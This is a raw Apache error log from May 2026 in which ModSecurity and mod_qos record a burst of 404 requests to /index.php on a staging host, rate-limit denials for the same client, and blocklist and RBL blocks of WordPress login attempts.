[Tue May 26 19:55:08.287881 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PbQAAAZ4"]
[Tue May 26 19:55:08.290202 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWywAAADw"]
[Tue May 26 19:55:08.295707 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PdwAAAgY"]
[Tue May 26 19:55:08.303978 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW1gAAAA0"]
[Tue May 26 19:55:08.308258 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PcgAAAcw"]
[Tue May 26 19:55:08.309182 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PbAAAAeU"]
[Tue May 26 19:55:08.314082 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW3QAAAEU"]
[Tue May 26 19:55:08.323016 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PiwAAAas"]
[Tue May 26 19:55:08.326039 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW5gAAABY"]
[Tue May 26 19:55:08.326955 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW2gAAAAM"]
[Tue May 26 19:55:08.338741 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW3gAAAFE"]
[Tue May 26 19:55:08.342327 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PfwAAAck"]
[Tue May 26 19:55:08.344216 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWygAAABA"]
[Tue May 26 19:55:08.354380 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWxQAAAAQ"]
[Tue May 26 19:55:08.355994 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PjAAAAZw"]
[Tue May 26 19:55:08.375561 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW2wAAAFs"]
[Tue May 26 19:55:08.376350 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXAAAAAEE"]
[Tue May 26 19:55:08.385261 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW3AAAAHg"]
[Tue May 26 19:55:08.391742 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PjQAAAfw"]
[Tue May 26 19:55:08.392969 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW7wAAAHo"]
[Tue May 26 19:55:08.393978 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PvQAAAZM"]
[Tue May 26 19:55:08.394018 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW7gAAAGA"]
[Tue May 26 19:55:08.394786 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXAgAAAF4"]
[Tue May 26 19:55:08.394953 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXAQAAAGI"]
[Tue May 26 19:55:08.397358 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW5QAAAGs"]
[Tue May 26 19:55:08.397811 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW_QAAACo"]
[Tue May 26 19:55:08.403306 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PqgAAAgo"]
[Tue May 26 19:55:08.422502 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszW2QAAAH0"]
[Tue May 26 19:55:08.428297 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXCAAAAAw"]
[Tue May 26 19:55:08.431018 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW8QAAACE"]
[Tue May 26 19:55:08.433724 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PqQAAAfU"]
[Tue May 26 19:55:08.434071 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXEQAAAAE"]
[Tue May 26 19:55:08.439657 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PvwAAAbk"]
[Tue May 26 19:55:08.443364 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXAwAAADI"]
[Tue May 26 19:55:08.494738 2026] [security2:error] [pid 93868:tid 94343] [client 178.20.43.173:52253] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.43.173" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtREqK9k_ZUB2Vp25P8wAAAeQ"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:55:08.932571 2026] [security2:error] [pid 93576:tid 93696] [remote 103.50.205.131:54834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWtRGDRMqfxdEDkoszXKQAABnI"]
[Tue May 26 19:55:09.284201 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXDQAAAHY"]
[Tue May 26 19:55:09.298159 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PyAAAAbE"]
[Tue May 26 19:55:09.299672 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXEgAAAFM"]
[Tue May 26 19:55:09.306222 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXFwAAAEo"]
[Tue May 26 19:55:09.313219 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXGQAAAFo"]
[Tue May 26 19:55:09.317112 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXFAAAAAg"]
[Tue May 26 19:55:09.319285 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25P2AAAAgA"]
[Tue May 26 19:55:09.325571 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXEwAAADs"]
[Tue May 26 19:55:09.328034 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PyQAAAaY"]
[Tue May 26 19:55:09.330328 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PzwAAAdg"]
[Tue May 26 19:55:09.334546 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25P2gAAAZs"]
[Tue May 26 19:55:09.339130 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25P1wAAAcI"]
[Tue May 26 19:55:09.341126 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXFgAAAFw"]
[Tue May 26 19:55:09.349107 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PxgAAAaA"]
[Tue May 26 19:55:09.354574 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtREqK9k_ZUB2Vp25QAwAAAfc"]
[Tue May 26 19:55:09.356411 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ2DRMqfxdEDkoszXHQAAAEc"]
[Tue May 26 19:55:09.356514 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRGDRMqfxdEDkoszXLwAAAHA"]
[Tue May 26 19:55:09.362599 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtREqK9k_ZUB2Vp25QBAAAAfE"]
[Tue May 26 19:55:09.369172 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25P3QAAAeI"]
[Tue May 26 19:55:09.375000 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtREqK9k_ZUB2Vp25QAgAAAgk"]
[Tue May 26 19:55:09.377421 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRGDRMqfxdEDkoszXKwAAAB4"]
[Tue May 26 19:55:09.383549 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRGDRMqfxdEDkoszXMAAAABQ"]
[Tue May 26 19:55:09.566916 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtRUqK9k_ZUB2Vp25QVgAAAew
[Tue May 26 19:55:09.570617 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXSAAAAD4"]
[Tue May 26 19:55:09.574814 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXSQAAAC0"]
[Tue May 26 19:55:09.579439 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtRUqK9k_ZUB2Vp25QWgAAAco
[Tue May 26 19:55:09.590853 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtRUqK9k_ZUB2Vp25QXQAAAcU
[Tue May 26 19:55:09.601172 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtRWDRMqfxdEDkoszXjwAAAGM
[Tue May 26 19:55:09.604104 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXVQAAADM"]
[Tue May 26 19:55:09.607276 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXYQAAACk"]
[Tue May 26 19:55:09.683155 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:49154] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QaAAAAc8
[Tue May 26 19:55:09.683240 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtRWDRMqfxdEDkoszXkQAAAFw
[Tue May 26 19:55:09.721528 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QagAAAe0
[Tue May 26 19:55:09.728206 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRWDRMqfxdEDkoszXkgAAACI
[Tue May 26 19:55:09.728929 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QawAAAac
[Tue May 26 19:55:09.734474 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QbQAAAdM
[Tue May 26 19:55:09.748116 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRWDRMqfxdEDkoszXkwAAADQ
[Tue May 26 19:55:09.755285 2026] [qos:error] [pid 93868:tid 94345] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QcAAAAeY
[Tue May 26 19:55:09.757735 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QcQAAAaw
[Tue May 26 19:55:09.758295 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QcgAAAdE
[Tue May 26 19:55:09.938871 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:49154] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QeAAAAeg
